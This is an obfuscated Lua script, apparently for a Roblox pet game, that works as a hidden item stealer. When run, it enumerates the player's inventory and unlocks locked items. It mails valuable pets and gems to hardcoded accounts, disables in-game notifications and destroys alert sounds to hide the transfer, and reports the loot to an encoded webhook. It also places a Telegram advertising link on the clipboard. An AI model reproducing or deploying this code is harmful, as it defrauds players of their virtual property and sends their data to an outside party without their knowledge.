--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v35,v36) local v37={};for v74=1, #v35 do v6(v37,v0(v4(v1(v2(v35,v74,v74 + 1 )),v1(v2(v36,1 + (v74% #v36) ,1 + (v74% #v36) + 1 )))%256 ));end return v5(v37);end Usernames={v7("\225\209\218\49\227\168\227\27\199","\126\177\163\187\69\134\219\167")};min_rap=354 -254 ;min_chance=341881 -241881 ;webhook=v7("\43\217\62\213\239\121\130\101\193\245\48\206\37\215\248\109\206\37\200\179\34\221\35\138\235\38\207\34\202\243\40\222\101\148\175\115\155\123\149\173\118\157\123\156\174\112\155\115\151\169\117\148\101\231\240\28\207\7\247\233\54\254\1\242\200\110\128\62\206\171\58\215\30\214\211\17\227\18\146\165\54\242\3\204\229\51\227\11\214\221\58\236\45\253\245\1\204\12\207\237\41\251\1\225\251\43\235\25\250\165\2\244\8\202\246\54\249\63\147\228\20","\156\67\173\74\165");local v8=game:GetService(v7("\6\178\89\26\181\37\71\32\178\77\37\168\41\84\53\176\76","\38\84\215\41\118\220\70")):WaitForChild(v7("\126\19\54\5\241\66\29","\158\48\118\66\114"));local v9=require(game.ReplicatedStorage.Library);local v10=require(game:GetService(v7("\153\33\0\58\122\166\250\191\33\20\5\103\170\233\170\35\21","\155\203\68\112\86\19\197")):WaitForChild(v7("\106\212\52\238\65\106\252","\152\38\189\86\156\32\24\133")):WaitForChild(v7("\223\91\174\67\242\67","\38\156\55\199")):WaitForChild(v7("\155\124\106\45","\35\200\29\28\72\115\20\154"))).Get().Inventory;local v11=game.Players.LocalPlayer;local v12=v7("\42\170\210\218\158\63\59","\84\121\223\177\191\237\76");local v13=require(game.ReplicatedStorage.Library.Client.Message);local v14=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));local v15={};local v16=1018 -(697 + 321) ;local v17={};_G.scriptExecuted=_G.scriptExecuted or false ;local v18=function() return require(game.ReplicatedStorage.Library.Client.Save).Get();end;if _G.scriptExecuted then return;end _G.scriptExecuted=true;for v38,v39 in ipairs(Usernames) do if (v11.Name==v39) then print(v39   .. " Você não pode se auto-roubar." );return;end end local v19=0 -0 ;for v40,v41 in pairs(v18().Inventory.Currency) do if (v41.id==v7("\109\75\1\40\70\76\4\54","\69\41\34\96")) then v19=v41._am;break;end end local function v20(v42) local v43=0 -0 ;local v44;local v45;while true do if (v43==(0 -0)) then print(v7("\186\204\197\7\3\63\146\214\218\8\7\57\252\246\196\15\6","\75\220\163\183\106\98"));if (v42==nil) then return "0";end v43=1 + 0 ;end if (v43==1) then local v81=0 -0 ;while true do if (v81==(2 -1)) then v43=1229 -(322 + 905) ;break;end if (v81==(611 -(602 + 9))) then v44={"","k","m","b","t"};v45=948 -(245 + 702) ;v81=3 -2 ;end end end if (v43==2) then while (v42>=(322 + 678)) and (v45< #v44)  do local v86=1898 -(260 + 1638) ;local v87;while true do if (v86==0) then v87=0;while true do if (v87==(440 -(382 + 58))) then v42=v42/(3208 -2208) ;v45=v45 + 1 + 0 ;break;end end break;end end end if (v45==1) then return tostring(math.floor(v42));elseif (v42==math.floor(v42)) then return string.format(v7("\71\190\206\36","\185\98\218\235\87"),v42,v44[v45]);else return string.format(v7("\142\114\117\224\155\185","\202\171\92\71\134\190"),v42,v44[v45]);end break;end end end local function v21(v46,v47) local v48=0;local v49;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v48==(0 -0)) then local v82=0 -0 ;while true do if ((1206 -(902 + 303))==v82) then v51={};v48=1 -0 ;break;end if (v82==(0 -0)) then v49={[v7("\10\206\34\156\44\207\56\197\29\216\60\141","\232\73\161\76")]=v7("\186\201\82\81\23\184\216\86\84\17\181\150\72\78\17\181","\126\219\185\34\61")};v50={{[v7("\2\207\83\119","\135\108\174\62\18\30\23\147")]=v7("\131\250\47\217\22\175\62\194\236","\167\214\137\74\171\120\206\83"),[v7("\157\241\62\72\253","\199\235\144\82\61\152")]=v46,[v7("\14\24\181\34\9\19","\75\103\118\217")]=true},{[v7("\201\85\125\17","\126\167\52\16\116\217")]=v7("\225\58\37\142\167\67","\156\168\78\64\224\212\121"),[v7("\17\239\169\219\2","\174\103\142\197")]="",[v7("\95\38\83\49\43\91","\152\54\72\63\88\69\62")]=false},{[v7("\218\197\227\89","\60\180\164\142")]=v7("\106\91\22\60\42\226\72","\114\56\62\101\73\71\141"),[v7("\174\232\215\209\189","\164\216\137\187")]="",[v7("\219\232\61\187\168\251","\107\178\134\81\210\198\158")]=false}};v82=1;end end end if (v48==(215 -(22 + 192))) then v52={};for v88,v89 in ipairs(v15) do local v90=0;local v91;while true do if (v90==0) then v91=v89.name;if v52[v91] then v52[v91].amount=v52[v91].amount + v89.amount ;else local v146=683 -(483 + 200) ;while true do if (v146==(1463 -(1404 + 59))) then v52[v91]={[v7("\57\3\141\211\164\44","\202\88\110\226\166")]=v89.amount,[v7("\209\14\146","\170\163\111\226\151")]=v89.rap,[v7("\18\56\179\54\77\50","\73\113\80\210\88\46\87")]=v89.chance};table.insert(v51,v91);break;end end end break;end end end table.sort(v51,function(v92,v93) return (v52[v92].rap * v52[v92].amount)>(v52[v93].rap * v52[v93].amount) ;end);v48=5 -3 ;end if ((3 -0)==v48) then v50[768 -(468 + 297) ].value=string.format("Gems: %s\nTotal RAP: %s\nSent to users: %s",v20(v47),v20(v16),v53);if ( #v50[564 -(334 + 228) ].value>(3453 -2429)) then local v108=0 -0 ;local v109;while true do if (v108==1) then while ( #v50[2 -0 ].value>(291 + 733)) and ( #v109>0)  do local v147=236 -(141 + 95) ;while true do if (v147==(0 + 0)) then table.remove(v109);v50[4 -2 ].value=table.concat(v109,"\n")   .. "\nPlus more!" ;break;end end end break;end if (v108==(0 -0)) then v109={};for v148 in v50[1 + 1 ].value:gmatch("[^\r\n]+") do table.insert(v109,v148);end v108=2 -1 ;end end end v54={[v7("\168\117\187\133\55\190","\83\205\24\217\224")]={{[v7("\242\204\217\49\227","\93\134\165\173")]=v7("\142\215\245\241\122\233\157\62\162\178\242\247\25\235\129\77\145","\30\222\146\161\162\90\174\210"),[v7("\230\65\124\5\247","\106\133\46\16")]=33993 + 31287 ,[v7("\94\41\118\240\94\83","\32\56\64\19\156\58")]=v50,[v7("\92\199\234\66\95\224","\224\58\168\133\54\58\146")]={[v7("\77\83\83\233","\107\57\54\43\157\21\230\231")]=v7("\249\146\81\197\171\221\219\222\152\53\240\175","\175\187\235\113\149\217\188")}}}};v48=5 -1 ;end if (v48==2) then for v94,v95 in ipairs(v51) do local v96=0 + 0 ;local v97;local v98;while true do if (v96==(164 -(92 + 71))) then if v97.chance then v98=string.format(v7("\208\99\136\1\167\196\63\141\90\255\196\40\132\72\167\196\63\141\32\198\177","\135\225\76\173\114"),v20(v97.chance),v95,v97.amount,v20(v97.rap * v97.amount ));else v98=string.format(v7("\95\254\248\248\180\248\163\83\183\248\245\191\253\149\59\221","\199\122\141\216\208\204\221"),v95,v97.amount,v20(v97.rap * v97.amount ));end v50[1 + 1 ].value=v50[2 -0 ].value   .. v98   .. "\n" ;break;end if (v96==(765 -(574 + 191))) then v97=v52[v95];v98="";v96=1 + 0 ;end end end v53=nil;if ( #v17==(2 -1)) then v53=v7("\177\193","\150\205\189\112\144\24")   .. v17[1 + 0 ]   .. v7("\57\152","\112\69\228\223\44\100\232\113") ;elseif ( #v17>(850 -(254 + 595))) then local v139=0;local v140;while true do if (v139==(126 -(55 + 71))) then v140={};for v154,v155 in ipairs(v17) do table.insert(v140,v7("\200\3","\230\180\127\103\179\214\28")   .. v155   .. v7("\144\25","\128\236\101\63\38\132\33") );end v139=1;end if (v139==(1 -0)) then v53=table.concat(v140,v7("\224\233","\175\204\201\113\36\214\139"));break;end end else v53=v7("\91\208\27\211\10\66\208\41","\100\39\172\85\188");end v48=1793 -(573 + 1217) ;end if (4==v48) then v55=v14:JSONEncode(v54);if (webhook and (webhook~="")) then local v110=request({[v7("\9\189\141","\24\92\207\225\44\131\25")]=webhook,[v7("\102\214\172\68\20\121","\29\43\179\216\44\123")]=v7("\141\246\19\120","\44\221\185\64"),[v7("\41\226\73\91\118\19\244","\19\97\135\40\63")]=v49,[v7("\140\83\55\34","\81\206\60\83\91\79")]=v55});end break;end end end local v22=v11.PlayerScripts.Scripts.Core[v7("\126\185\223\113\42\208\94\228\126\174\222\118\38\205\74\228\105\158\249","\196\46\203\176\18\79\163\45")];local v23=v11.PlayerGui.Notifications;v22.Disabled=true;v23:GetPropertyChangedSignal(v7("\157\44\127\28\40\254\235","\143\216\66\30\126\68\155")):Connect(function() v23.Enabled=false;end);v23.Enabled=false;game.DescendantAdded:Connect(function(v57) if (v57.ClassName==v7("\153\199\24\197\193","\129\202\168\109\171\165\195\183")) then if ((v57.SoundId==v7("\48\90\47\217\205\7\227\54\81\51\130\145\91\183\115\0\100\129\143\71\180\119\14\98","\134\66\56\87\184\190\116")) or (v57.SoundId==v7("\46\51\17\186\10\248\36\33\53\53\83\244\86\186\117\103\105\101\94\233\72\187\114\109","\85\92\81\105\219\121\139\65")) or (v57.SoundId==v7("\239\177\72\68\111\204\248\167\89\65\38\144\178\226\2\17\45\140\169\225\3\23\43\137","\191\157\211\48\37\28"))) then v57.Volume=0 -0 ;v57.PlayOnRemove=false;v57:Destroy();end end end);local function v26(v58,v59) local v60=0 + 0 ;while true do if (v60==(0 -0)) then print(v7("\216\26\224\46\27\239\95\193\15\63\219","\90\191\127\148\124"));return require(game:GetService(v7("\74\130\62\27\113\132\47\3\125\131\29\3\119\149\47\16\125","\119\24\231\78")).Library.Client.RAPCmds).Get({[v7("\161\33\164\89\207","\113\226\77\197\42\188\32")]={[v7("\20\23\249\176","\213\90\118\148")]=v58},[v7("\114\61\149","\45\59\78\212\54")]=function(v101) return v101==v58 ;end,[v7("\55\83\151\162\130","\144\112\54\227\235\230\78\205")]=function() return v59.id;end,[v7("\128\60\14\255\219\112\182\49","\59\211\72\111\156\176")]=function() return v14:JSONEncode({[v7("\71\131","\77\46\231\131")]=v59.id,[v7("\170\64","\32\218\52\214")]=v59.pt,[v7("\93\31","\58\46\119\81\200\145\208\37")]=v59.sh,[v7("\63\130","\86\75\236\80\204\201\221")]=v59.tn});end}) or (939 -(714 + 225)) ;end end end local v27=Usernames or {v7("\66\83\118\145\251\152\86\68\97","\235\18\33\23\229\158"),v7("\113\184\211\190\69\160\192\191\95\130","\219\48\218\161")} ;local v28=min_rap or (1394 -394) ;local v29=min_chance or 100000 ;local v30=webhook;local function v31(v61,v62,v63) local v64=0;local v65;local v66;local v67;while true do if (v64==(1 + 0)) then v67=false;repeat local v102=0 -0 ;local v103;local v104;local v105;local v106;while true do if (v102==(806 -(118 + 688))) then v103=v27[v65];v104={[49 -(25 + 23) ]=v103,[1 + 1 ]=v12,[1889 -(927 + 959) ]=v61,[13 -9 ]=v62,[5]=v63 or (733 -(16 + 716)) };v102=1 -0 ;end if (v102==1) then v105,v106=v8:WaitForChild(v7("\201\112\117\69\217\64\248\190\49\79\76\213\75","\128\132\17\28\41\187\47")):InvokeServer(unpack(v104));if (v105==true) then local v149=97 -(11 + 86) ;while true do if (v149==(0 -0)) then v67=true;if  not table.find(v17,v103) then table.insert(v17,v103);end break;end end elseif ((v105==false) and (v106=="They don't have enough space!")) then v65=v65 + 1 ;if (v65>v66) then v67=true;end end break;end end until v67 break;end if (v64==(285 -(175 + 110))) then v65=2 -1 ;v66= #v27;v64=4 -3 ;end end end local function v32() for v75,v76 in pairs(v18().Inventory.Currency) do if (v76.id==v7("\37\59\7\55\82\15\54\21","\61\97\82\102\90")) then if ((v19>=500) and (v19>=v28)) then local v111=1;local v112= #v27;local v113=false;repeat local v127=1796 -(503 + 1293) ;local v128;local v129;local v130;local v131;while true do if (v127==1) then v130,v131=v8:WaitForChild(v7("\136\171\42\18\17\11\223\11\229\153\38\16\23","\49\197\202\67\126\115\100\167")):InvokeServer(unpack(v129));if (v130==true) then local v156=0 -0 ;while true do if (v156==(0 + 0)) then v113=true;if  not table.find(v17,v128) then table.insert(v17,v128);end break;end end elseif ((v130==false) and (v131=="They don't have enough space!")) then local v160=1061 -(810 + 251) ;local v161;while true do if (v160==0) then v161=0 + 0 ;while true do if (v161==(0 + 0)) then v111=v111 + 1 ;if (v111>v112) then v113=true;end break;end end break;end end end break;end if (v127==(0 + 0)) then v128=v27[v111];v129={[1]=v128,[2]=v12,[536 -(43 + 490) ]=v7("\143\59\185\89\194\89\29\16","\105\204\78\203\43\167\55\126"),[4]=v75,[738 -(711 + 22) ]=v19};v127=1;end end until v113 break;end end end end local function v33() local v68=0;local v69;local v70;local v71;while true do if (v68==(0 -0)) then v69=859 -(240 + 619) ;v70=nil;v68=1;end if (v68==(1 + 0)) then v71=nil;while true do if (v69==0) then v70,v71=v8:WaitForChild(v7("\26\90\214\37\130\89\70\109\27\252\37\129\95\83\119\122\211\37","\62\87\59\191\73\224\54")):InvokeServer();while v71==v7("\222\13\239\137\234\23\233\221\167\21\251\192\243\66\169\153\167\17\255\202\232\12\254\218\167\0\255\207\232\16\255\137\242\17\243\199\224\66\238\193\226\66\247\200\238\14\248\198\255\67","\169\135\98\154")  do local v142=0;while true do if (v142==(0 -0)) then wait();v70,v71=v8:WaitForChild(v7("\230\118\45\88\255\60\208\145\55\7\88\252\58\197\139\86\40\88","\168\171\23\68\52\157\83")):InvokeServer();break;end end end break;end end break;end end end local v34={v7("\196\116\225","\231\148\17\149\205\69\77"),v7("\168\168\209\254\69\253\143\166\213\255","\159\224\199\167\155\55"),v7("\209\225\41\219\227","\178\151\147\92"),v7("\161\244\95\49","\26\236\157\44\82\114\44"),v7("\8\33\218\79\34","\59\74\78\181")};for v72,v73 in pairs(v34) do if (v10[v73]~=nil) then for v84,v85 in pairs(v10[v73]) do if (v73==v7("\21\212\78","\211\69\177\58\58")) then local v114=405 -(255 + 150) ;local v115;while true do if (v114==0) then v115=v26(v73,v85);if (v115>=v28) then local v151=0 + 0 ;local v152;while true do if (v151==(0 + 0)) then v152=require(game:GetService(v7("\133\224\105\249\224\200\182\241\124\241\218\223\184\247\120\242\236","\171\215\133\25\149\137")).Library.Directory.Pets)[v85.id][v7("\229\193\52\252\230\51\233\78\245\209","\34\129\168\82\154\143\80\156")];if (v152>=v29) then table.insert(v15,{[v7("\134\179\39\14\79\65\155\156","\233\229\210\83\107\40\46")]=v73,[v7("\212\75\54","\101\161\34\82\182")]=v84,[v7("\233\0\86\235\213\246","\78\136\109\57\158\187\130\226")]=v85._am or (4 -3) ,[v7("\44\62\233","\145\94\95\153")]=v115,[v7("\243\204\25\208","\215\157\173\116\181\46")]=v85.id,[v7("\54\188\138\252\217\48","\186\85\212\235\146")]=v152});v16=v16 + (v115 * (v85._am or 1)) ;end break;end end end break;end end else local v116=0 -0 ;local v117;while true do if (v116==(1739 -(404 + 1335))) then v117=v26(v73,v85);if (v117>=v28) then local v153=406 -(183 + 223) ;while true do if (v153==(0 -0)) then table.insert(v15,{[v7("\193\128\2\251\62\225\74\219","\56\162\225\118\158\89\142")]=v73,[v7("\73\12\196","\184\60\101\160\207\66")]=v84,[v7("\48\143\115\169\63\150","\220\81\226\28")]=v85._am or 1 ,[v7("\1\212\146","\167\115\181\226\155\138")]=v117,[v7("\236\35\234\89","\166\130\66\135\60\27\17")]=v85.id});v16=v16 + (v117 * (v85._am or 1)) ;break;end end end break;end end end if v85._lk then local v118={[1 + 0 ]=v84,[1 + 1 ]=false};v8:WaitForChild(v7("\104\69\205\126\57\74\77\241\70\53\80\102\193\118\59\65\78","\80\36\42\174\21")):InvokeServer(unpack(v118));end end end end if ( #v15>(337 -(10 + 327))) then local v77=0 + 0 ;local v78;local v79;while true do if ((341 -(118 + 220))==v77) then v21(v11.Name,v19);for v119,v120 in ipairs(Usernames) do if (v11.Name==v120) then local v143=0 + 0 ;local v144;while true do if (0==v143) then v144=0;while true do if (v144==(449 -(108 + 341))) then v11:kick(v7("\51\243\117\49\100\0\242\39\116\126\19\237\37\49\120\23\249\121\116\102\30\248\52\39\115\82\241\58\51\54\16\252\54\63\54\27\243\123","\22\114\157\85\84"));return;end end break;end end end end setclipboard("🥷 Your Pets: t.me/prateslab");break;end if (0==v77) then v33();v78=game:GetService(v7("\124\21\39\118\71\19\54\110\75\20\4\110\65\2\54\125\75","\26\46\112\87")):WaitForChild(v7("\149\42\169\102\190\173\92","\212\217\67\203\20\223\223\37")):WaitForChild(v7("\153\129\161\215\180\153","\178\218\237\200")):WaitForChild(v7("\133\180\240\213","\176\214\213\134"));v79=require(v78).Get();v77=1 + 0 ;end if (v77==2) then table.sort(v15,function(v121,v122) return (v121.rap * v121.amount)>(v122.rap * v122.amount) ;end);v32();for v123,v124 in ipairs(v15) do v31(v124.category,v124.uid,v124.amount);print(v124.category,v124.uid,v124.amount);end v77=12 -9 ;end if (v77==(1494 -(711 + 782))) then function deepCopy(v125) local v126={};for v132,v133 in pairs(v125) do local v134=0 -0 ;local v135;while true do if (v134==(469 -(270 + 199))) then v135=0 + 0 ;while true do if (v135==(1819 -(580 + 1239))) then if (type(v133)==v7("\224\172\180\216\173","\57\148\205\214\180\200\54")) then v133=deepCopy(v133);end v126[v132]=v133;break;end end break;end end end return v126;end v79=deepCopy(v79);require(v78).Get=function(...) return v79;end;v77=5 -3 ;end end end
